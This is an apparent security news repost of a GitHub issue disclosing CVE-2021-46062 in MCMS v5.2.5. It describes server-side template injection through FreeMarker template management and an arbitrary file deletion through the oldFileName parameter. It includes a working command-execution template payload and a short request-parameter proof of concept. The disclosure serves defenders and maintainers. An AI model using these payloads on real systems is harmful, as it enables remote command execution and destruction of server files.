Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-46062: SSTI、Delete any file · Issue #59 · ming-soft/MCMS

MCMS v5.2.5 was discovered to contain an arbitrary file deletion vulnerability via the component oldFileName.

CVE
#vulnerability#web#git#java

SSTI
FreeMarker template is used in the project,and there is no secure configuration
Insert the payload in the background - > system settings - > template management
<#assign value="freemarker.template.utility.Execute"?new()>${value(“whoami”)}
image

image
net/mingsoft/basic/action/TemplateAction.java There’s a suffix check, it’s written to the file
image

net/mingsoft/basic/util/BasicUtil.java GetRealTemplatePath of this class is called
image

coverage /target/classes/WEB-INF/manager/main.ftl ,Refresh the home page
image

Delete any file
If the oldFileName argument exists, the corresponding file is deleted
image
Call the FileUtil.class
image
poc:
fileName=x&oldFileName=file destination

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907